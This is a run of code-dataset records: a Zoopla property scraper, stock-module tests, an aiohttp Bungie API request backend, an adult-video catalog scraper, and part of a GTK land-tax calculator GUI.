property[\"Reception_rooms\"]=item.find(\"span\", {\"class\":\"num-icon num-reception\"}).text\n except:\n property[\"Reception_rooms\"]=\"0\"\n try:\n property[\"Agent_Name\"]=item.find(\"p\", {\"class\":\"top-half listing-results-marketed\"}).find(\"span\").text\n except:\n property[\"Agent_Name\"]=\"None\"\n try:\n property[\"Agent_tel\"]=item.find(\"span\", {\"class\":\"agent_phone\"}).find(\"span\").text\n except:\n property[\"Agent_tel\"]=\"None\"\n property[\"Website\"] = \"Zoopla\"\n property[\"Acquire_time\"] = str(search_time)\n\n proplist.append(property)\n\nif len(proplist) > 0:\n print (str(len(proplist)) + \" properties found\")\n print (\"On \" + str(numpages) + \" pages\\n\")\n df = 
pandas.DataFrame(proplist)\n\n    try:\n        avprice = np.asarray(df[\"Price\"], dtype=int).mean()\n        print(\"Average Price: \")\n        print(avprice)\n        print(\"Properties with price not explicitly specified excluded from average\")\n\n        with open(\"average_prices.txt\", 'a') as file:\n            file.write(f\"\\n{search_time}_Average Price from OTM for properties within {radius} miles of {city}: \" + \"£\" + str(int(avprice)))\n\n    except Exception:\n        print(\"Cannot calculate average\")\n\n    save_prompt = input(\"\\nSave results as spreadsheet? y/n: \")\n\n    if \"y\" in save_prompt:\n        filename = f\"{search_time}_{city}\"\n        df.to_csv(f\"{filename}.csv\")\n        print(f\"Saved data in file: '{filename}.csv'\")\n    else:\n        print(\"No spreadsheet saved\")\n\n    print(f\"Saving {len(proplist)} properties to {city.upper()} database...\")\n    storage.connect(city)\n\n    properties_saved = 0\n    properties_existing = 0\n\n    for p in proplist: # consider adding tqdm - and removing print statements in storage\n        if storage.insert(city, p['Date_Listed'], p['Price'], p['Address'], p['Beds'], p['Bathrooms'], p['Reception_rooms'], p['Agent_Name'], p['Agent_tel'], p['Website'], p['Acquire_time']) == 'new':\n            properties_saved += 1\n        else:\n            properties_existing += 1\n    print(f\"Saved {properties_saved} to {city} - {properties_existing} already in database\")\n\n    print(\"Saved to DB\")","sub_path":"zoopla_scraper.py","file_name":"zoopla_scraper.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"198801881","text":"import datetime\n\nimport pytest\n\nfrom stock_ai import util\nfrom stock_ai.module import StockCN\nfrom test import is_travis\n\n\n@pytest.mark.skipif(is_travis, reason=\"Skipping this test on Travis CI.\")\ndef test_get_info_mongodb():\n    \"\"\"Test the default data.\"\"\"\n    s = StockCN('601398')\n    _test_info(s)\n\n\ndef _test_info(stock: StockCN):\n    \"\"\"Test the default data.\"\"\"\n    assert stock.code == '601398'\n    assert stock.name == '工商银行'\n    assert stock.exchange == 'sh'\n    assert util.date2str(stock.ipo_date) == '2006-10-27'\n    assert isinstance(stock.ipo_date, datetime.datetime)\n\n\ndef test_stockcn_construct():\n    \"\"\"Test the constructor.\"\"\"\n    s = StockCN('601398')\n    _test_info(s)\n    assert not s.getblock_online\n    assert not s.getdaily_online\n    assert not s.getinfo_online\n\n\ndef test_get_info_online():\n    s = StockCN('601398', getinfo_online=True)\n    _test_info(s)\n\n\ndef test_getdaily_online():\n    s = StockCN('601398', getdaily_online=True)\n    d1 = s.get_daily()\n    assert not d1.empty\n    d2 = s.get_daily(start='2010-01-04')\n    assert d1.iloc[-1].equals(d2.iloc[-1])\n    assert not d2.empty\n    d3 = s.get_daily(end='2010-01-04')\n    assert not d3.empty\n    assert d1.iloc[0].equals(d3.iloc[0])\n    assert d2.iloc[0].equals(d3.iloc[-1])\n    d4 = s.get_daily(start='2010-01-04', end='2010-01-04')\n    assert not d4.empty\n    d4 = s.get_daily(start='2010-01-01', end='2010-01-01')\n    assert d4.empty\n\n\ndef test_getblock_online():\n    s = StockCN('601398', getblock_online=is_travis)\n    print(s.block)\n    assert not s.block.empty\n\n\ndef test_getrelated_codes():\n    s = StockCN('601398', getblock_online=is_travis)\n    print(s.related_codes)\n    assert len(s.related_codes) > 0\n    assert '601398' not in s.related_codes\n    assert '601939' in s.related_codes\n\n\ndef test_get_sharpe_ratio():\n    print(StockCN('601398', 
getdaily_online=is_travis).get_sharpe_ratio())\n","sub_path":"test/test_stockcn.py","file_name":"test_stockcn.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"558593689","text":"import asyncio\nimport logging\nimport random\nfrom typing import Optional, Union\n\nimport aiohttp\nimport aiohttp_client_cache\n\nfrom ElevatorBot.networking.bungieRatelimiting import BungieRateLimiter\nfrom ElevatorBot.networking.models import WebResponse\n\n\n# get logger\nlogger = logging.getLogger(\"network\")\n\n# the limiter object which to not get rate-limited by bungie\nbungie_limiter = BungieRateLimiter()\n\n# how many times to retry a request\nmax_web_request_tries = 10\n\n\nasync def get_request(\n session: Union[aiohttp_client_cache.CachedSession, aiohttp.ClientSession],\n url: str,\n headers: dict = None,\n params: dict = None,\n bungie_request: bool = True,\n) -> WebResponse:\n \"\"\"\n Makes a get request to the specified url\n Returns instance of WebResponse()\n \"\"\"\n\n response = None\n\n # wait for a token from the rate limiter\n if bungie_request:\n async with asyncio.Lock():\n await bungie_limiter.wait_for_token()\n\n # abort after max_web_request_tries tries\n for _ in range(max_web_request_tries):\n try:\n async with session.get(\n url=url,\n headers=headers,\n params=params,\n ) as request:\n response = await handle_request_data(\n request=request,\n url=url,\n )\n\n # try again\n if response is None:\n continue\n\n # return response\n else:\n return response\n\n except (asyncio.exceptions.TimeoutError, ConnectionResetError):\n logger.error(\"Timeout error for '%s'\", url)\n await asyncio.sleep(random.randrange(2, 6))\n continue\n\n # return that it failed\n if response:\n return response\n logger.error(\n \"Request failed '%s' times, aborting for '%s'\", max_web_request_tries, url\n )\n no_response = WebResponse(\n content=None,\n status=None,\n )\n no_response.error_message = \"Request failed\"\n return no_response\n\n\nasync def post_request(\n session: Union[aiohttp_client_cache.CachedSession, aiohttp.ClientSession],\n url: str,\n data: dict,\n headers: dict = None,\n params: dict = None,\n bungie_request: bool = True,\n) -> WebResponse:\n \"\"\"\n Makes a post request to the specified url\n Returns instance of WebResponse()\n \"\"\"\n\n response = None\n\n # wait for a token from the rate limiter\n if bungie_request:\n async with asyncio.Lock():\n await bungie_limiter.wait_for_token()\n\n # abort after max_web_request_tries tries\n for _ in range(max_web_request_tries):\n try:\n async with session.post(\n url=url,\n data=data,\n headers=headers,\n params=params,\n allow_redirects=False,\n ) as request:\n response = await handle_request_data(\n request=request,\n url=url,\n )\n\n # try again\n if response is None:\n continue\n\n # return response\n else:\n return response\n\n except (asyncio.exceptions.TimeoutError, ConnectionResetError):\n logger.error(\"Timeout error for '%s'\", url)\n await asyncio.sleep(random.randrange(2, 6))\n continue\n\n # return that it failed\n if response:\n return response\n logger.error(\n \"Request failed '%s' times, aborting for '%s'\", max_web_request_tries, url\n )\n no_response = WebResponse(\n content=None,\n status=None,\n )\n no_response.error_message = \"Request failed\"\n return no_response\n\n\nasync def handle_request_data(\n request: Union[aiohttp.ClientResponse, aiohttp_client_cache.CachedResponse],\n url: str,\n) -> Optional[WebResponse]:\n 
\"\"\"\n Handle the request results\n \"\"\"\n\n # make sure the return is a json, sometimes we get a http file for some reason\n if \"application/json\" not in request.headers[\"Content-Type\"]:\n logger.error(\n \"'%s': Wrong content type '%s' with reason '%s' for '%s'\",\n request.status,\n request.headers[\"Content-Type\"],\n request.reason,\n url,\n )\n if request.status == 200:\n logger.error(\"Wrong content type returned text: '%s'\", await request.text())\n await asyncio.sleep(3)\n return\n\n # get the response as a json\n try:\n response = WebResponse(\n content=await request.json(),\n status=request.status,\n )\n\n # set the error vars\n response.error = None\n if \"ErrorStatus\" in response.content:\n response.error = response.content[\"ErrorStatus\"]\n elif \"error_description\" in response.content:\n response.error = response.content[\"error_description\"]\n response.error_code = (\n response.content[\"ErrorCode\"] if \"ErrorCode\" in response.content else None\n )\n response.error_message = (\n response.content[\"Message\"] if \"Message\" in response.content else None\n )\n\n # set if the response was cached\n try:\n response.from_cache = request.from_cache\n except AttributeError:\n response.from_cache = False\n\n except aiohttp.ClientPayloadError:\n logger.error(\"'%s': Payload error, retrying for '%s'\", request.status, url)\n return\n except aiohttp.ContentTypeError:\n logger.error(\"'%s': Content type error, retrying for '%s'\", request.status, url)\n return\n\n # if response is ok return it\n if response.status == 200:\n response.success = True\n return response\n\n # handling any errors if not ok\n stop_loop_due_to_error = await handle_bungie_errors(\n url=url,\n response=response,\n )\n if stop_loop_due_to_error:\n return response\n\n\nasync def handle_bungie_errors(url: str, response: WebResponse) -> bool:\n \"\"\"\n Looks for typical bungie errors and handles / logs them\n Returns: if_loop_should_be_stopped: bool\n \"\"\"\n\n # generic bad request, such as wrong format\n if response.status == 400:\n logger.error(\n \"'%s - %s': Generic bad request for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n return True\n\n # not found\n elif response.status == 404:\n logger.error(\n \"'%s - %s': No stats found for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n return True\n\n # bungie is ded\n elif response.status == 503:\n logger.error(\n \"'%s - %s': Server is overloaded for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n await asyncio.sleep(10)\n\n # rate limited\n elif response.status == 429:\n logger.warning(\n \"'%s - %s': Getting rate limited for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n await asyncio.sleep(2)\n\n # we we are getting throttled\n elif (\n response.error == \"PerEndpointRequestThrottleExceeded\"\n or response.error == \"DestinyDirectBabelClientTimeout\"\n ):\n logger.warning(\n \"'%s - %s': Getting throttled for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n\n throttle_seconds = response.content[\"ErrorStatus\"][\"ThrottleSeconds\"]\n\n await asyncio.sleep(throttle_seconds + random.randrange(1, 3))\n\n # if user doesn't have that item\n elif response.error == \"DestinyItemNotFound\":\n logger.error(\n \"'%s - %s': User doesn't have that item for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n return True\n\n # private profile\n elif response.error == 
\"DestinyPrivacyRestriction\":\n logger.error(\n \"'%s - %s': User has private Profile for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n return True\n\n # timeout\n elif response.error == \"DestinyDirectBabelClientTimeout\":\n logger.warning(\n \"'%s - %s': Getting timeouts for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n await asyncio.sleep(60)\n\n # user has disallowed clan invites\n elif response.error == \"ClanTargetDisallowsInvites\":\n logger.error(\n \"'%s - %s': User disallows clan invites '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n return True\n\n # user has disallowed clan invites\n elif response.error == \"AuthorizationRecordRevoked\":\n logger.error(\n \"'%s - %s': User refresh token is outdated and they need to re-register for '%s' - '%s'\",\n response.status,\n response,\n url,\n response.error_message,\n )\n return True\n\n else:\n logger.error(\n \"'%s - %s': Request failed for '%s' - '%s'\",\n response.status,\n response.error,\n url,\n response,\n )\n await asyncio.sleep(2)\n\n return False\n","sub_path":"ElevatorBot/networking/networkBackend.py","file_name":"networkBackend.py","file_ext":"py","file_size_in_byte":9623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"143452285","text":"__author__ = 'YJ'\n# -*- coding: UTF-8 -*-\nimport os\nimport os.path\nimport configparser\n\nfrom AV import *\nfrom Report import *\n\nhost = 'localhost'\nuser = 'root'\npasswd = '123456'\ndatabase = 'javlibrary'\ndb = Mysql(host, user, passwd, database)\n# 读取上次的网址\n\n\ndef get_option():\n cf = configparser.ConfigParser()\n cf.read('conf.ini')\n last_url = cf.get('last time', 'url')\n last_actor = cf.get('last time', 'actor')\n url = input('请输入影片目录第一页的地址(默认为上次: %s):\\n' % last_url)\n rebuild_flag = False\n if url == '':\n url = last_url\n elif url != last_url:\n rebuild_flag = True\n cf.set('last time', 'url', url)\n search_method = input('请选择搜索方式: 1.按演员 2.按分数(默认为1): ')\n if search_method == '':\n search_method = '1'\n if search_method == '1':\n actor = input('请输入要搜索谁的作品(默认为上次:%s): ' % last_actor)\n if actor == '':\n actor = last_actor\n elif actor != last_actor:\n cf.set('last time', 'actor', actor)\n cf.write(open('conf.ini', 'w'))\n return url, search_method, actor, None, rebuild_flag\n if search_method == '2':\n min_score = input('请输入最低分数(默认8.5): ')\n if min_score == '':\n min_score = 8.5\n return url, search_method, None, min_score, rebuild_flag\n\n\ndef rebuild_data():\n spider = Spider()\n spider.get_catalog_pages(url)\n catalog_pages = db.select_all_catalog_pages()\n for catalog_page in catalog_pages:\n analyst = Analyst(str(catalog_page))\n video_links = analyst.get_video_list()\n for video in video_links:\n video_exits = db.select_video(video)\n if not video_exits:\n video_content = spider.get_detail_page(video)\n if video_content:\n analyst = Analyst(video_content)\n video_details = analyst.get_video_details()\n db.save_video(video_details)\n\n\nif __name__ == '__main__':\n result_list = []\n url, search_method, actor, min_score, rebuild_flag = get_option()\n # if True:\n if rebuild_flag:\n rebuild_data()\n\n catalog_pages = db.select_all_catalog_pages()\n for catalog_page in catalog_pages:\n analyst = Analyst(str(catalog_page))\n video_links = analyst.get_video_list()\n for video in video_links:\n video_exits = db.select_video(video)\n if video_exits:\n video_details = {'title': video_exits[1], 'actor': video_exits[2], 'score': 
video_exits[3],\n 'link': video_exits[4], 'search': video_exits[5], 'cover': video_exits[6]}\n if search_method == '1':\n if Searcher(video_details).by_actor(actor):\n result_list.append(video_details)\n\n if search_method == '2':\n if Searcher(video_details).by_score(min_score):\n result_list.append(video_details)\n\n result_list = sorted(result_list, key=lambda i: i['score'], reverse=True)\n\n Report(result_list)\n os.system(r'start report.html')\n","sub_path":"Explorer.py","file_name":"Explorer.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"318368271","text":"from gi.repository import Gtk, GdkPixbuf, Pango\nfrom ui_xml import ui_xml\n\nimport re\n\nINT_MAX = 2147483647\n\nclass ReWindow(Gtk.Window):\n\n\tdef __init__(self):\n\t\t# __init__ is build \"layer-by-layer\" according to layout map:\n\n\t\t\"\"\"\n\t\tApplication GUI layout map:\n\n\t\t0\t1\t2\t3\t4\t5\t6\t7\n\t\tReWindow\n\t\t\tPaned (global_paned)\n\t\t\t\tBox(3) (edit_box)\n\t\t\t\t\tMenuBar (edit_menubar)\n\t\t\t\t\tToolbar (edit_toolbar)\n\t\t\t\t\tPaned (edit_paned)\n\t\t\t\t\t\tNotebook(2) (edit_notebook)\n\t\t\t\t\t\t\tScrolledWindow (wordpad_scroller)\n\t\t\t\t\t\t\t\tTextView (wordpad)\n\t\t\t\t\t\t\tBox(2) (ssheet_box)\n\t\t\t\t\t\t\t\tScrolledWindow (ssheet_scroller)\n\t\t\t\t\t\t\t\t\tTreeView (ssheet)\n\t\t\t\t\t\t\t\tToolbar (ssheet_toolbar)\n\t\t\t\t\t\tScrolledWindow (report_scroller)\n\t\t\t\t\t\t\tTextView (report)\n\t\t\t\tBox(2) (error_box)\n\t\t\t\t\tToolbar (error_toolbar)\n\t\t\t\t\tScrolledWindow (error_scroller)\n\t\t\t\t\t\tTextView (error)\n\t\t\"\"\"\n\n\n\n\t\t# Level 0:\n\t\tGtk.Window.__init__(self)\n\t\tself.set_title('Land-tax Calculator')\n\t\tself.set_default_size(1200, 650)\n\n\t\tui_manager = Gtk.UIManager()\n\t\tui_manager.add_ui_from_string(ui_xml)\n\n\t\taction_group = Gtk.ActionGroup('Actions')\n\t\tself.build_tooltips_dict()\n\t\tself.append_edit_menubar_actions(action_group)\n\t\tself.append_edit_toolbar_actions(action_group)\n\t\tself.append_ssheet_toolbar_actions(action_group)\n\t\tself.append_error_toolbar_actions(action_group)\n\t\tui_manager.insert_action_group(action_group)\n\n\t\tfont = Pango.FontDescription('DejaVu Sans Mono Book 10')\n\n\n\n\t\t# Level 1:\n\t\tself.global_paned = Gtk.Paned()\n\t\tself.global_paned.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tself.add(self.global_paned)\n\n\n\n\t\t# Level 2:\n\t\tself.edit_box = Gtk.Box()\n\t\tself.edit_box.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tself.global_paned.pack1(self.edit_box, True, True)\n\n\t\tself.error_box = Gtk.Box()\n\t\tself.error_box.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tself.global_paned.pack2(self.error_box, True, True)\n\n\n\n\t\t# Level 3:\n\t\t# edit_box components:\n\t\tself.edit_menubar = ui_manager.get_widget('/MenuBar')\n\t\tself.edit_box.pack_start(self.edit_menubar, False, False, 0)\n\n\t\tself.edit_toolbar = ui_manager.get_widget('/EditToolbar')\n\t\tself.edit_box.pack_start(self.edit_toolbar, False, False, 0)\n\n\t\ticon_theme = Gtk.IconTheme.get_default()\n\n\t\tself.edit_toolbar.get_nth_item(6).set_icon_name('x-office-document')\n\t\tself.edit_toolbar.get_nth_item(7).set_icon_name('x-office-spreadsheet')\n\t\tself.edit_toolbar.get_nth_item(9).set_icon_name('x-office-presentation')\n\n\t\tself.edit_paned = Gtk.Paned()\n\t\tself.edit_paned.set_orientation(Gtk.Orientation.HORIZONTAL)\n\t\tself.edit_box.pack_start(self.edit_paned, True, True, 0)\n\n\n\t\t# error_box 
components:\n\t\tself.error_toolbar = ui_manager.get_widget('/ErrorToolbar')\n\t\tself.error_box.pack_start(self.error_toolbar, False, False, 0)\n\n\t\tself.error_scroller = Gtk.ScrolledWindow()\n\t\tself.error_box.pack_start(self.error_scroller, True, True, 0)\n\n\n\n\t\t# Level 4:\n\t\t# edit_paned components:\n\t\tself.edit_notebook = Gtk.Notebook()\n\t\tself.edit_notebook.set_property('show-tabs', False)\n\t\tself.edit_paned.pack1(self.edit_notebook, True, True)\n\n\t\tself.report_scroller = Gtk.ScrolledWindow()\n\t\tself.edit_paned.pack2(self.report_scroller, True, True)\n\n\n\t\t# error_scroller components:\n\t\tself.error = Gtk.TextView()\n\t\tself.error.modify_font(font)\n\t\tself.text_view_apply_ro(self.error)\n\t\tself.error_scroller.add(self.error)\n\n\n\n\t\t# Level 5:\n\t\t# edit_notebook components:\n\t\tself.wordpad_scroller = Gtk.ScrolledWindow()\n\t\tself.edit_notebook.append_page(self.wordpad_scroller, Gtk.Label('Wordpad'))\n\n\t\tself.ssheet_box = Gtk.Box()\n\t\tself.ssheet_box.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tself.edit_notebook.append_page(self.ssheet_box, Gtk.Label('Spreadsheet'))\n\n\n\t\t# report_scroller components:\n\t\tself.report = Gtk.TextView()\n\t\tself.report.modify_font(font)\n\t\tself.text_view_apply_ro(self.report)\n\t\tself.report_scroller.add(self.report)\n\n\n\n\t\t# Level 6:\n\t\t# wordpad_scroller components:\n\t\tself.wordpad = Gtk.TextView()\n\t\tself.wordpad.modify_font(font)\n\t\tself.wordpad_scroller.add(self.wordpad)\n\n\t\t# ssheet_box components:\n\t\tself.ssheet_scroller = Gtk.ScrolledWindow()\n\t\tself.ssheet_box.pack_start(self.ssheet_scroller, True, True, 0)\n\n\t\tself.ssheet_toolbar = ui_manager.get_widget('/SSheetToolbar')\n\t\tself.ssheet_box.pack_start(self.ssheet_toolbar, False, False, 0)\n\n\n\n\t\t# Level 7:\n\t\t# ssheet_box components:\n\t\tself.liststore = Gtk.ListStore(int, int, int, int)\n\t\tself.liststore.append([54645647, 3, 33, 90])\n\t\tself.liststore.append([74894866, 1, 12, 22])\n\n\t\tself.ssheet = Gtk.TreeView(model = self.liststore)\n\n\t\tssheet_renderers = [\n\t\t\tGtk.CellRendererText(),\n\t\t\tGtk.CellRendererText(),\n\t\t\tGtk.CellRendererText(),\n\t\t\tGtk.CellRendererText()\n\t\t\t]\n\t\tssheet_handlers = [\n\t\t\tself.tree_view_edited_id,\n\t\t\tself.tree_view_edited_type,\n\t\t\tself.tree_view_edited_width,\n\t\t\tself.tree_view_edited_heights\n\t\t\t]\n\t\tfor i in range(4):\n\t\t\tssheet_renderers[i].connect('edited', ssheet_handlers[i])\n\t\tfor i in ssheet_renderers:\n\t\t\ti.set_property('editable', True)\n\n\t\tssheet_columns = [\n\t\t\tGtk.TreeViewColumn('#', ssheet_renderers[0], text=0),\n\t\t\tGtk.TreeViewColumn('Type', ssheet_renderers[1], text=1),\n\t\t\tGtk.TreeViewColumn('Width', ssheet_renderers[2], text=2),\n\t\t\tGtk.TreeViewColumn('Heights', ssheet_renderers[3], text=3)\n\t\t\t]\n\t\tssheet_columns[0].set_property('min-width', 150)\n\t\tssheet_columns[1].set_property('min-width', 80)\n\t\tssheet_columns[2].set_property('min-width', 100)\n\t\tssheet_columns[3].set_property('min-width', 100)\t\t\n\t\tfor i in ssheet_columns:\n\t\t\ti.set_property('resizable', True)\n\t\t\ti.set_property('reorderable', True)\n\t\t\tself.ssheet.append_column(i)\n\n\t\tself.ssheet_scroller.add(self.ssheet)\n\n\n\t\tself.clear()\n\t\tself.apply_handlers()\n\t\tself.built_errors_dict()\n\n\n\n\tdef build_tooltips_dict(self):\n\t\tself.tooltips = {\n\t\t\t'New'\t\t:\t'Create new file',\n\t\t\t'Open'\t\t:\t'Open existing file',\n\t\t\t'Save'\t\t:\t'Save current file',\n\t\t\t'RepSave'\t:\t'Save 
report-file',\n\t\t\t'Add'\t\t:\t'Add new entry to the spreadsheet',\n\t\t\t'Del'\t\t:\t'Del highlightened entry from the spreadsheet',\n\t\t\t'Wordpad'\t:\t'Switch to \"Wordpad\" mode',\n\t\t\t'SSheet'\t:\t'Switch to \"Spreadsheet\" mode',\n\t\t\t'Report'\t:\t'Enable/Disable \"Report view\" area',\n\t\t\t'ErrClose'\t:\t'Close EГГOГ notification area',\n\t\t\t'Error'\t\t:\t'REMOVE DAT FUKN EГГOГS!'\n\t\t\t}\n\n\tdef append_edit_menubar_actions(self, action_group):\n\t\taction_group.add_action(Gtk.Action(\"Menu_File\", \"File\", None, None))\n\t\taction_group.add_actions([\n\t\t\t('File_New', Gtk.STOCK_NEW, 'New', None, None, self.file_close),\n\t\t\t('File_Open', Gtk.STOCK_OPEN, 'Open...', None, None, self.file_open),\n\t\t\t('File_Save', Gtk.STOCK_SAVE, 'Save', None, None, self.file_save),\n\t\t\t('File_SaveAs', Gtk.STOCK_SAVE, 'Save As...', None, None, self.file_save_as),\n\t\t\t('File_ReportSave', Gtk.STOCK_SAVE, 'Save Report', None, None, self.file_save_report),\n\t\t\t('File_ReportSaveAs', Gtk.STOCK_SAVE, 'Save Report As...', None, None, self.file_save_report_as),\n\t\t\t('File_Close', Gtk.STOCK_DELETE, 'Close', None, None, self.file_close),\n\t\t\t('File_Quit', Gtk.STOCK_QUIT, 'Quit', None, None, self.file_quit)\n\t\t\t])\n\n\t\taction_group.add_action(Gtk.Action(\"Menu_View\", \"View\", None, None))\n\t\taction_group.add_actions([\n\t\t\t('View_WordpadMode', None, '\"Wordpad\" Mode', None, None, self.view_wordpad),\n\t\t\t('View_SSheetMode', None, '\"Spreadsheet\" Mode', None, None, self.view_ssheet),\n\t\t\t('View_ReportSwitch', None, 'Report Area', None, None, self.view_report)\n\t\t\t])\n\n\t\taction_group.add_action(Gtk.Action(\"Menu_Help\", \"Help\", None, None))\n\t\taction_group.add_actions([\n\t\t\t('Help_About', Gtk.STOCK_ABOUT, 'About', None, None, self.help_about)\n\t\t\t])\n\n\tdef append_edit_toolbar_actions(self, action_group):\n\t\taction_group.add_actions([\n\t\t\t('Tbm_New', Gtk.STOCK_NEW, 'New', None, self.tooltips['New'], self.file_new),\n\t\t\t('Tbm_Open', Gtk.STOCK_OPEN, 'Open...', None, self.tooltips['Open'], self.file_open),\n\t\t\t('Tbm_Save', Gtk.STOCK_SAVE, 'Save', None, self.tooltips['Save'], self.file_save),\n\t\t\t('Tbm_ReportSave', Gtk.STOCK_SAVE, 'Save Report', None, self.tooltips['RepSave'], self.file_save_report),\n\t\t\t('Tbm_WordpadMode', None, '\"Wordpad\" Mode', None, self.tooltips['Wordpad'], self.view_wordpad),\n\t\t\t('Tbm_SSheetMode', None, '\"Spreadsheet\" Mode', None, self.tooltips['SSheet'], self.view_ssheet),\n\t\t\t('Tbm_ReportSwitch', None, 'Report Area', None, self.tooltips['Report'], self.view_report)\n\t\t\t])\n\n\tdef append_ssheet_toolbar_actions(self, action_group):\n\t\taction_group.add_actions([\n\t\t\t('Tbs_Add', Gtk.STOCK_ADD, 'Add', None, self.tooltips['Add'], self.tbs_add),\n\t\t\t('Tbs_Del', Gtk.STOCK_DELETE, 'Del', None, self.tooltips['Del'], self.tbs_del)\n\t\t\t])\n\n\tdef append_error_toolbar_actions(self, action_group):\n\t\taction_group.add_actions([\n\t\t\t('Tbe_Close', Gtk.STOCK_DELETE, 'Add', None, self.tooltips['ErrClose'], self.error_close),\n\t\t\t('Tbe_Label', None, 'EГГOГ:', None, self.tooltips['Error'], None)\n\t\t\t])\n\n\n\n\tdef text_view_apply_ro(self, text_view):\n\t\ttext_view.set_property('editable', False)\n\t\ttext_view.set_property('cursor-visible', False)\n\n\n\t# HANDLERS:\n\tdef tree_view_edited_id(self, widget, path, text):\n\t\tx = self.str_to_int(text)\n\n\t\tif(x != None and x > 0):\n\t\t\tself.liststore[path][0] = x\n\t\telse:\n\t\t\tself.error_show(self.errors['IDVal'])\n\n\tdef 
tree_view_edited_type(self, widget, path, text):\n\t\tx = self.str_to_int(text)\n\n\t\tif (x != None and 5 >= x >= 1):\n\t\t\tself.liststore[path][1] = x\n\t\telse:\n\t\t\tself.error_show(self.errors['TypeVal'])\n\n\tdef tree_view_edited_width(self, widget, path, text):\n\t\tx = self.str_to_int(text)\n\n\t\tif(x != None and x > 0):\n\t\t\tself.liststore[path][2] = x\n\t\telse:\n\t\t\tself.error_show(self.errors['WidthVal'])\n\n\tdef tree_view_edited_heights(self, widget, path, text):\n\t\tx = self.str_to_int(text)\n\n\t\tif(x != None and x > 0):\n\t\t\tself.liststore[path][3] = x\n\t\telse:\n\t\t\tself.error_show(self.errors['HeightsVal'])\n\n\n\n\tdef file_new(self, widget):\n\t\tif not self.file_saved:\n\t\t\tresponse = self.unsaved_dialog()\n\n\t\t\tif response == True:\n\t\t\t\tself.file_save(self)\n\t\t\telif response == None:\n\t\t\t\treturn\n\n\t\tself.clear()\n\n\tdef file_open(self, widget):\n\t\tfile_path = self.get_open_file_path()\n\t\tif file_path != None:\n\t\t\tself.clear()\n\t\t\t\n\t\t\tself.file_path = file_path\n\t\t\tself.text_to_liststore( self.read_from_file(self.file_path) )\n\n\t\t\tself.refresh()\n\n\tdef file_save(self, widget):\n\t\tif self.file_path == None:\n\t\t\tself.file_save_as(self)\n\t\telse:\n\t\t\ttext = self.liststore_to_text()\n\t\t\tself.write_to_file(self.file_path, text)\n\n\tdef file_save_as(self, widget):\n\t\tfile_path = self.get_save_file_path()\n\t\tif file_path != None:\n\t\t\tself.file_path = file_path\n\n\t\t\ttext = self.liststore_to_text()\n\t\t\tself.write_to_file(self.file_path, text)\n\n\tdef file_save_report(self, widget):\n\t\tif self.report_path == None:\n\t\t\tself.file_save_report_as(self)\n\t\telse:\n\t\t\ttext = self.report_gen()\n\t\t\tself.write_to_file(self.report_path, text)\n\n\tdef file_save_report_as(self, widget):\n\t\treport_path = self.get_save_file_path()\n\t\tif report_path != None:\n\t\t\tself.report_path = report_path\n\n\t\t\ttext = self.report_gen()\n\t\t\tself.write_to_file(self.report_path, text)\n\n\tdef file_close(self, widget):\n\t\tself.file_new(self)\n\n\tdef file_quit(self, widget):\n\t\tself.file_new(self)\n\t\tself.destroy()\n\n\tdef view_wordpad(self, widget):\n\t\tif (self.edit_notebook.get_current_page() == 0):\n\t\t\treturn\n\n\t\tself.ssheet_box.hide()\n\t\tself.wordpad.show()\n\t\tself.edit_notebook.set_current_page(0)\n\n\t\tself.refresh_wordpad()\n\n\tdef view_ssheet(self, widget):\n\t\tif (self.edit_notebook.get_current_page() == 1):\n\t\t\treturn\n\n\t\tself.ssheet_box.show_all()\n\t\tself.wordpad.hide()\n\t\tself.edit_notebook.set_current_page(1)\n\n\t\tself.reparse_ssheet()\n\n\tdef view_report(self, widget):\n\t\tif not ( self.report_scroller.get_visible() ):\n\t\t\tself.report_scroller.show()\n\t\t\tself.refresh_report()\n\t\telse:\n\t\t\tself.report_scroller.hide()\n\n\tdef help_about(self, widget):\n\t\tself.about_dialog()\n\n\tdef tbs_add(self, widget):\n\t\tself.file_saved = False\n\n\t\tself.liststore.append([1, 1, 1, 1])\n\n\t\tself.refresh_report()\n\n\tdef tbs_del(self, widget):\n\t\tself.file_saved = False\n\n\t\tselection = self.ssheet.get_selection()\n\t\tselected = selection.get_selected()\n\t\tselected[0].remove(selected[1])\n\n\t\tself.refresh_report()\n\n\tdef error_close(self, widget):\n\t\tself.error_hide()\n\n\n\n\tdef liststore_row_changed(self, liststore, path, iter):\n\t\tself.file_saved = False\n\n\t\tself.refresh_report()\n\n\tdef wordpad_buffer_changed(self, buffer):\n\t\tself.file_saved = False\n\n\t\tself.reparse_ssheet()\n\n\n\n\t# HELPERS:\n\tdef 
